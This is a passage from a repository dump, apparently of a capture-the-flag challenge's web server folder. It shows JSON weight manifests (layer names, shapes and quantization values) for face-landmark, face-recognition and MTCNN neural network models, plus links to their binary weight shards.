"dtype":"uint8","scale":0.002681120470458386,"min":-0.36463238398234055}},{"name":"dense2/conv3/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0048311497650894465,"min":-0.5797379718107336}},{"name":"dense2/conv3/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011227761062921263,"min":-1.4483811771168429}},{"name":"dense2/conv3/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0034643323982463162,"min":-0.3360402426298927}},{"name":"dense3/conv0/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.003394978887894574,"min":-0.49227193874471326}},{"name":"dense3/conv0/pointwise_filter","shape":[1,1,128,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010051267287310432,"min":-1.2765109454884247}},{"name":"dense3/conv0/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.003142924752889895,"min":-0.4588670139219247}},{"name":"dense3/conv1/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00448304671867221,"min":-0.5872791201460595}},{"name":"dense3/conv1/pointwise_filter","shape":[1,1,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.016063522357566685,"min":-2.3613377865623026}},{"name":"dense3/conv1/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00287135781026354,"min":-0.47664539650374765}},{"name":"dense3/conv2/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006002906724518421,"min":-0.7923836876364315}},{"name":"dense3/conv2/pointwise_filter","shape":[1,1,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.017087187019048954,"min":-1.6061955797906016}},{"name":"dense3/conv2/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.003124481205846749,"min":-0.46242321846531886}},{"name":"dense3/conv3/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006576311588287353,"min":-1.0193282961845398}},{"name":"dense3/conv3/pointwise_filter","shape":[1,1,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.015590153955945782,"min":-1.99553970636106}},{"name":"dense3/conv3/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004453541601405424,"min":-0.6546706154065973}},{"name":"fc/weights","shape":[256,136],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010417488509533453,"min":-1.500118345372817}},{"name":"fc/bias","shape":[136],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0025084222648658005,"min":0.07683877646923065}}],"paths":["face_landmark_68_model-shard1"]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_tiny_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_tiny_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_tiny_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | [{"weights":[{"name":"dense0/conv0/filters","shape":[3,3,3,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008194216092427571,"min":-0.9423348506291708}},{"name":"dense0/conv0/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006839508168837603,"min":-0.8412595047670252}},{"name":"dense0/conv1/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.009194007106855804,"min":-1.2779669878529567}},{"name":"dense0/conv1/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0036026100317637128,"min":-0.3170296827952067}},{"name":"dense0/conv1/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.000740380117706224,"min":-0.06367269012273527}},{"name":"dense0/conv2/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":1,"min":0}},{"name":"dense0/conv2/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":1,"min":0}},{"name":"dense0/conv2/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0037702228508743585,"min":-0.6220867703942692}},{"name":"dense1/conv0/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0033707996209462483,"min":-0.421349952618281}},{"name":"dense1/conv0/pointwise_filter","shape":[1,1,32,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.014611541991140328,"min":-1.8556658328748217}},{"name":"dense1/conv0/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002832523046755323,"min":-0.30307996600281956}},{"name":"dense1/conv1/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006593170586754294,"min":-0.6329443763284123}},{"name":"dense1/conv1/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.012215249211180444,"min":-1.6001976466646382}},{"name":"dense1/conv1/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002384825547536214,"min":-0.3028728445370992}},{"name":"dense1/conv2/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005859645441466687,"min":-0.7617539073906693}},{"name":"dense1/conv2/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.013121426806730382,"min":-1.7845140457153321}},{"name":"dense1/conv2/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0032247188044529336,"min":-0.46435950784122243}},{"name":"dense2/conv0/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002659512618008782,"min":-0.32977956463308894}},{"name":"dense2/conv0/pointwise_filter","shape":[1,1,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.015499923743453681,"min":-1.9839902391620712}},{"name":"dense2/conv0/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0032450980999890497,"min":-0.522460794098237}},{"name":"dense2/conv1/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005911862382701799,"min":-0.792189559282041}},{"name":"dense2/conv1/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.021025861478319356,"min":-2.2077154552235325}},{"name":"dense2/conv1/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00349616945958605,"min":-0.46149436866535865}},{"name":"dense2/conv2/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008104994250278847,"min":-1.013124281284856}},{"name":"dense2/conv2/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.029337059282789044,"min":-3.5791212325002633}},{"name":"dense2/conv2/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0038808938334969913,"min":-0.4230174278511721}},{"name":"fc/weights","shape":[128,136],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.014016061670639936,"min":-1.8921683255363912}},{"name":"fc/bias","shape":[136],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0029505149698724935,"min":0.088760145008564}}],"paths":["face_landmark_68_tiny_model-shard1"]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-shard2 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_recognition_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | [{"weights":[{"name":"conv32_down/conv/filters","shape":[7,7,3,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0005260649557207145,"min":-0.07101876902229645}},{"name":"conv32_down/conv/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":8.471445956577858e-7,"min":-0.00014740315964445472}},{"name":"conv32_down/scale/weights","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.06814416062598135,"min":5.788674831390381}},{"name":"conv32_down/scale/biases","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008471635042452345,"min":-0.931879854669758}},{"name":"conv32_1/conv1/conv/filters","shape":[3,3,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0007328585666768691,"min":-0.0974701893680236}},{"name":"conv32_1/conv1/conv/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":1.5952091238361e-8,"min":-0.000001978059313556764}},{"name":"conv32_1/conv1/scale/weights","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.02146628510718252,"min":3.1103382110595703}},{"name":"conv32_1/conv1/scale/biases","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0194976619645661,"min":-2.3787147596770644}},{"name":"conv32_1/conv2/conv/filters","shape":[3,3,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0004114975824075587,"min":-0.05267169054816751}},{"name":"conv32_1/conv2/conv/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":4.600177166424806e-9,"min":-5.70421968636676e-7}},{"name":"conv32_1/conv2/scale/weights","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.03400764932819441,"min":2.1677730083465576}},{"name":"conv32_1/conv2/scale/biases","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010974494616190593,"min":-1.240117891629537}},{"name":"conv32_2/conv1/conv/filters","shape":[3,3,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0005358753251094444,"min":-0.0760942961655411}},{"name":"conv32_2/conv1/conv/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":5.9886454383719385e-9,"min":-7.366033889197485e-7}},{"name":"conv32_2/conv1/scale/weights","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.014633869657329485,"min":2.769575357437134}},{"name":"conv32_2/conv1/scale/biases","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.022131107367721257,"min":-2.5229462399202234}},{"name":"conv32_2/conv2/conv/filters","shape":[3,3,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00030145110452876373,"min":-0.03949009469326805}},{"name":"conv32_2/conv2/conv/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":6.8779549306497095e-9,"min":-9.010120959151119e-7}},{"name":"conv32_2/conv2/scale/weights","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.03929369870354148,"min":4.8010945320129395}},{"name":"conv32_2/conv2/scale/biases","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010553357180427103,"min":-1.2452961472903983}},{"name":"conv32_3/conv1/conv/filters","shape":[3,3,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0003133527642371608,"min":-0.040735859350830905}},{"name":"conv32_3/conv1/conv/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":4.1064200719547974e-9,"min":-3.0387508532465503e-7}},{"name":"conv32_3/conv1/scale/weights","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.009252088210161994,"min":2.333256721496582}},{"name":"conv32_3/conv1/scale/biases","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.007104101251153385,"min":-0.34810096130651585}},{"name":"conv32_3/conv2/conv/filters","shape":[3,3,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00029995629892629733,"min":-0.031195455088334923}},{"name":"conv32_3/conv2/conv/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":5.62726418316814e-9,"min":-6.921534945296811e-7}},{"name":"conv32_3/conv2/scale/weights","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0467432975769043,"min":5.362040996551514}},{"name":"conv32_3/conv2/scale/biases","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010314425300149357,"min":-1.268674311918371}},{"name":"conv64_down/conv1/conv/filters","shape":[3,3,32,64],"dtype":"float32"},{"name":"conv64_down/conv1/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":8.373908033218849e-10,"min":-1.172347124650639e-7}},{"name":"conv64_down/conv1/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0066875364266189875,"min":2.5088400840759277}},{"name":"conv64_down/conv1/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01691421620986041,"min":-2.0973628100226906}},{"name":"conv64_down/conv2/conv/filters","shape":[3,3,64,64],"dtype":"float32"},{"name":"conv64_down/conv2/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":2.3252014483766877e-9,"min":-2.673981665633191e-7}},{"name":"conv64_down/conv2/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.032557439804077146,"min":2.6351239681243896}},{"name":"conv64_down/conv2/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.015429047509735706,"min":-1.5429047509735707}},{"name":"conv64_1/conv1/conv/filters","shape":[3,3,64,64],"dtype":"float32"},{"name":"conv64_1/conv1/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":1.1319172039756998e-9,"min":-1.4941307092479238e-7}},{"name":"conv64_1/conv1/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.007802607031429515,"min":3.401733160018921}},{"name":"conv64_1/conv1/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01425027146058924,"min":-0.6982633015688727}},{"name":"conv64_1/conv2/conv/filters","shape":[3,3,64,64],"dtype":"float32"},{"name":"conv64_1/conv2/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":2.5635019893325435e-9,"min":-2.717312108692496e-7}},{"name":"conv64_1/conv2/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.04062801716374416,"min":3.542381525039673}},{"name":"conv64_1/conv2/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.007973166306813557,"min":-0.7415044665336609}},{"name":"conv64_2/conv1/conv/filters","shape":[3,3,64,64],"dtype":"float32"},{"name":"conv64_2/conv1/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":1.2535732661062331e-9,"min":-1.8302169685151004e-7}},{"name":"conv64_2/conv1/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005631206549850164,"min":2.9051668643951416}},{"name":"conv64_2/conv1/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01859012585060269,"min":-2.3795361088771445}},{"name":"conv64_2/conv2/conv/filters","shape":[3,3,64,64],"dtype":"float32"},{"name":"conv64_2/conv2/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":2.486726369919351e-9,"min":-3.5311514452854786e-7}},{"name":"conv64_2/conv2/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.03740917467603497,"min":5.571568965911865}},{"name":"conv64_2/conv2/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006418555858088475,"min":-0.5263215803632549}},{"name":"conv64_3/conv1/conv/filters","shape":[3,3,64,64],"dtype":"float32"},{"name":"conv64_3/conv1/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":7.432564576875473e-10,"min":-8.47312361763804e-8}},{"name":"conv64_3/conv1/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006400122362024644,"min":2.268010377883911}},{"name":"conv64_3/conv1/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010945847922680425,"min":-1.3353934465670119}},{"name":"conv64_3/conv2/conv/filters","shape":[3,3,64,64],"dtype":"float32"},{"name":"conv64_3/conv2/conv/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":2.278228722014533e-9,"min":-3.212302498040492e-7}},{"name":"conv64_3/conv2/scale/weights","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.029840927498013366,"min":7.038398265838623}},{"name":"conv64_3/conv2/scale/biases","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010651412197187834,"min":-1.161003929493474}},{"name":"conv128_down/conv1/conv/filters","shape":[3,3,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00020040544662989823,"min":-0.022245004575918704}},{"name":"conv128_down/conv1/conv/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":4.3550543563576545e-10,"min":-4.311503812794078e-8}},{"name":"conv128_down/conv1/scale/weights","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.007448580685783835,"min":2.830846071243286}},{"name":"conv128_down/conv1/scale/biases","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01211262824488621,"min":-1.6957679542840696}},{"name":"conv128_down/conv2/conv/filters","shape":[3,3,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00022380277514457702,"min":-0.02484210804104805}},{"name":"conv128_down/conv2/conv/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":9.031058637304466e-10,"min":-1.1650065642122761e-7}},{"name":"conv128_down/conv2/scale/weights","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.027663578706629135,"min":3.1111555099487305}},{"name":"conv128_down/conv2/scale/biases","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008878476946961646,"min":-1.029903325847551}},{"name":"conv128_1/conv1/conv/filters","shape":[3,3,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00022380667574265425,"min":-0.032899581334170175}},{"name":"conv128_1/conv1/conv/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":4.4147297756478345e-10,"min":-5.253528433020923e-8}},{"name":"conv128_1/conv1/scale/weights","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.013599334978589825,"min":3.634530782699585}},{"name":"conv128_1/conv1/scale/biases","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.014059314073300829,"min":-1.4059314073300828}},{"name":"conv128_1/conv2/conv/filters","shape":[3,3,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00021715293474057143,"min":-0.02909849325523657}},{"name":"conv128_1/conv2/conv/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":9.887046963276768e-10,"min":-1.1370104007768284e-7}},{"name":"conv128_1/conv2/scale/weights","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.029993299409454943,"min":3.630716562271118}},{"name":"conv128_1/conv2/scale/biases","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00782704236460667,"min":-0.7200878975438136}},{"name":"conv128_2/conv1/conv/filters","shape":[3,3,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00017718105923895743,"min":-0.022324813464108636}},{"name":"conv128_2/conv1/conv/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":3.567012027797675e-10,"min":-5.243507680862582e-8}},{"name":"conv128_2/conv1/scale/weights","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.007940645778880399,"min":4.927767753601074}},{"name":"conv128_2/conv1/scale/biases","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.015933452867994122,"min":-1.5614783810634238}},{"name":"conv128_2/conv2/conv/filters","shape":[3,3,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0001451439717236687,"min":-0.01712698866339291}},{"name":"conv128_2/conv2/conv/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":1.0383988570966347e-9,"min":-1.2356946399449953e-7}},{"name":"conv128_2/conv2/scale/weights","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.02892604528688917,"min":4.750600814819336}},{"name":"conv128_2/conv2/scale/biases","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00797275748907351,"min":-0.7414664464838364}},{"name":"conv256_down/conv1/conv/filters","shape":[3,3,128,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0002698827827093648,"min":-0.03994265184098599}},{"name":"conv256_down/conv1/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":5.036909834755123e-10,"min":-6.396875490139006e-8}},{"name":"conv256_down/conv1/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.014870181738161573,"min":4.269900798797607}},{"name":"conv256_down/conv1/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.022031106200872685,"min":-3.1063859743230484}},{"name":"conv256_down/conv2/conv/filters","shape":[3,3,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00046430734150549946,"min":-0.03946612402796745}},{"name":"conv256_down/conv2/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":6.693064577513153e-10,"min":-7.630093618364995e-8}},{"name":"conv256_down/conv2/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.03475512242784687,"min":3.608360528945923}},{"name":"conv256_down/conv2/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01290142021927179,"min":-1.1482263995151893}},{"name":"conv256_1/conv1/conv/filters","shape":[3,3,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00037147209924810076,"min":-0.04234781931428348}},{"name":"conv256_1/conv1/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":3.2105515457510146e-10,"min":-3.467395669411096e-8}},{"name":"conv256_1/conv1/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.043242172166412955,"min":5.28542947769165}},{"name":"conv256_1/conv1/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01643658619300992,"min":-1.3149268954407936}},{"name":"conv256_1/conv2/conv/filters","shape":[3,3,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0003289232651392619,"min":-0.041773254672686264}},{"name":"conv256_1/conv2/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":9.13591691187321e-10,"min":-1.2333487831028833e-7}},{"name":"conv256_1/conv2/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0573908618852204,"min":4.360693454742432}},{"name":"conv256_1/conv2/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0164216583850337,"min":-1.3958409627278647}},{"name":"conv256_2/conv1/conv/filters","shape":[3,3,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00010476927912118389,"min":-0.015610622589056398}},{"name":"conv256_2/conv1/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":2.418552539068639e-10,"min":-2.539480166022071e-8}},{"name":"conv256_2/conv1/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.06024209564807368,"min":6.598613739013672}},{"name":"conv256_2/conv1/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01578534350675695,"min":-1.1049740454729864}},{"name":"conv256_2/conv2/conv/filters","shape":[3,3,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00005543030908002573,"min":-0.007427661416723448}},{"name":"conv256_2/conv2/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":1.0822061852320308e-9,"min":-1.515088659324843e-7}},{"name":"conv256_2/conv2/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.04302893993901272,"min":2.2855491638183594}},{"name":"conv256_2/conv2/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006792667566561232,"min":-0.8083274404207865}},{"name":"conv256_down_out/conv1/conv/filters","shape":[3,3,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.000568966465253456,"min":-0.05632768006009214}},{"name":"conv256_down_out/conv1/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":4.5347887884881677e-10,"min":-6.530095855422961e-8}},{"name":"conv256_down_out/conv1/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.017565592597512638,"min":4.594101905822754}},{"name":"conv256_down_out/conv1/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.04850864223405427,"min":-6.306123490427055}},{"name":"conv256_down_out/conv2/conv/filters","shape":[3,3,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0003739110687199761,"min":-0.06954745878191555}},{"name":"conv256_down_out/conv2/conv/bias","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":1.2668428328152895e-9,"min":-2.2549802424112154e-7}},{"name":"conv256_down_out/conv2/scale/weights","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.04351314469879749,"min":4.31956672668457}},{"name":"conv256_down_out/conv2/scale/biases","shape":[256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.021499746921015722,"min":-1.2039858275768804}},{"name":"fc","shape":[256,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.000357687911566566,"min":-0.04578405268052045}}],"paths":["face_recognition_model-shard1","face_recognition_model-shard2"]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/mtcnn_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/mtcnn_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/mtcnn_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | [{"paths":["mtcnn_model-shard1"],"weights":[{"dtype":"float32","name":"pnet/conv1/weights","shape":[3,3,3,10]},{"dtype":"float32","name":"pnet/conv1/bias","shape":[10]},{"dtype":"float32","name":"pnet/prelu1_alpha","shape":[10]},{"dtype":"float32","name":"pnet/conv2/weights","shape":[3,3,10,16]},{"dtype":"float32","name":"pnet/conv2/bias","shape":[16]},{"dtype":"float32","name":"pnet/prelu2_alpha","shape":[16]},{"dtype":"float32","name":"pnet/conv3/weights","shape":[3,3,16,32]},{"dtype":"float32","name":"pnet/conv3/bias","shape":[32]},{"dtype":"float32","name":"pnet/prelu3_alpha","shape":[32]},{"dtype":"float32","name":"pnet/conv4_1/weights","shape":[1,1,32,2]},{"dtype":"float32","name":"pnet/conv4_1/bias","shape":[2]},{"dtype":"float32","name":"pnet/conv4_2/weights","shape":[1,1,32,4]},{"dtype":"float32","name":"pnet/conv4_2/bias","shape":[4]},{"dtype":"float32","name":"rnet/conv1/weights","shape":[3,3,3,28]},{"dtype":"float32","name":"rnet/conv1/bias","shape":[28]},{"dtype":"float32","name":"rnet/prelu1_alpha","shape":[28]},{"dtype":"float32","name":"rnet/conv2/weights","shape":[3,3,28,48]},{"dtype":"float32","name":"rnet/conv2/bias","shape":[48]},{"dtype":"float32","name":"rnet/prelu2_alpha","shape":[48]},{"dtype":"float32","name":"rnet/conv3/weights","shape":[2,2,48,64]},{"dtype":"float32","name":"rnet/conv3/bias","shape":[64]},{"dtype":"float32","name":"rnet/prelu3_alpha","shape":[64]},{"dtype":"float32","name":"rnet/fc1/weights","shape":[576,128]},{"dtype":"float32","name":"rnet/fc1/bias","shape":[128]},{"dtype":"float32","name":"rnet/prelu4_alpha","shape":[128]},{"dtype":"float32","name":"rnet/fc2_1/weights","shape":[128,2]},{"dtype":"float32","name":"rnet/fc2_1/bias","shape":[2]},{"dtype":"float32","name":"rnet/fc2_2/weights","shape":[128,4]},{"dtype":"float32","name":"rnet/fc2_2/bias","shape":[4]},{"dtype":"float32","name":"onet/conv1/weights","shape":[3,3,3,32]},{"dtype":"float32","name":"onet/conv1/bias","shape":[32]},{"dtype":"float32","name":"onet/prelu1_alpha","shape":[32]},{"dtype":"float32","name":"onet/conv2/weights","shape":[3,3,32,64]},{"dtype":"float32","name":"onet/conv2/bias","shape":[64]},{"dtype":"float32","name":"onet/prelu2_alpha","shape":[64]},{"dtype":"float32","name":"onet/conv3/weights","shape":[3,3,64,64]},{"dtype":"float32","name":"onet/conv3/bias","shape":[64]},{"dtype":"float32","name":"onet/prelu3_alpha","shape":[64]},{"dtype":"float32","name":"onet/conv4/weights","shape":[2,2,64,128]},{"dtype":"float32","name":"onet/conv4/bias","shape":[128]},{"dtype":"float32","name":"onet/prelu4_alpha","shape":[128]},{"dtype":"float32","name":"onet/fc1/weights","shape":[1152,256]},{"dtype":"float32","name":"onet/fc1/bias","shape"